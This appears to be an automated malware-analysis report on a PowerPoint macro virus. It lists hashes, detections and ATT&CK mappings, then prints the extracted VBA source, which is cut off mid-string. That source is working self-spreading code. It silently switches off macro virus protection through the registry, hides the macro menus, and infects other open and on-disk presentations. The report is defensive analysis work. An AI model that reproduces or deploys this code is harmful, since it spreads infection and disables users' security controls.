Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 860f5a7cb2564392…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 24.5 KB
Created: 2003-12-26 11:34:38
Authoring application: Microsoft PowerPoint
First seen: 2012-06-14
MD5: 3cf8ea391f613a7f833947b73da9f520
SHA-1: 415169659ab7bc4b8fb2e8ac377d2d2ae3b15761
SHA-256: 860f5a7cb2564392a36446eb791ba9d91f39cfb1954deb723d7116de22380b90
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is a PowerPoint file containing VBA macros that attempt to disable macro security by writing to the registry key HKCU\Software\Microsoft\Office\8.0\PowerPoint\Options. It also exports its own VBA code to 'C:\CONFIG.LAC' and creates a registry file 'c:\power.reg'. The embedded URL 'http://www.nod32.com.au/' is present but has an unknown reputation. The primary intent appears to be self-propagation and evasion of security controls.

Heuristics (4)

  • ClamAV: Win.Trojan.PPT97-1 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PPT97-1
  • VBA macros detected (medium) OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The VBA macro code contains a Shell() call.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.nod32.com.au/ (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4272 bytes
SHA-256: 8b936a64ab19fde3e62f3d7d306bf588f56b8f37534a9df8378cb818d7c3abb9
Detection
ClamAV: Win.Trojan.PP97M-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With

With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub

Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With

With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub

Attribute VB_Name = "Module1"
Const OurAmy = "Amy"
Public SlideAmy As Object
'----------------------------------------------------------------
'PPT.Amy.a
'By -KD- [Metaphase VX Team & NoMercyVirusTeam]
'Greets to Raven, KidCypher, Error-, Foxz, Evul, Roadkil, Tally
'JFK, Slagehammer, AngelsKitten, BSL4, Antistate and #virus
'----------------------------------------------------------------
Sub A\(Amy): On Error Resume Next
If Dir(Application.Path & ".VXD") = "" Then _
ActivePresentation.VBProject.VBComponents(OurAmy).Export Application.Path & ".VXD"
For Each SlideAmy In Presentations
CatchAmy
Next
With Application.FileSearch
 .LookIn = ActivePresentation.Path
 .FileName = "*.PPT"
 .SearchSubFolders = True
 .Execute
 For MyAmy = 1 To .FoundFiles.Count
If .FoundFiles(MyAmy) = ActivePresentation.FullName Then GoTo CatchThis
 Set SlideAmy = Presentations.Open(.FoundFiles(MyAmy))
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
 Call CatchAmy
 SlideAmy.Save
End If
SlideAmy.Close
CatchThis Next
End With
End Sub
Private Sub CatchAmy()
On Error Resume Next
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
 SlideAmy.VBProject.VBComponents.Import Application.Path & ".VXD"
 For Each AmyAction In SlideAmy.Slides(SlideAmy.Slides.Count).Shapes
If AmyAction.ActionSettings(ppMouseOver).Action = 0 Then
AmyAction.ActionSettings(ppMouseOver).Action = ppActionRunMacro
AmyAction.ActionSettings(ppMouseOver).Run = "A\"
If Day(Date) = "1" Or Day(Date) = "25" Then
Assistant.Visible = True
  With Assistant.NewBalloon
   .Icon = msoIconAlert
   .Text = "Here I am again. again overwhelming feelings. thousand miles away. part of
... (truncated)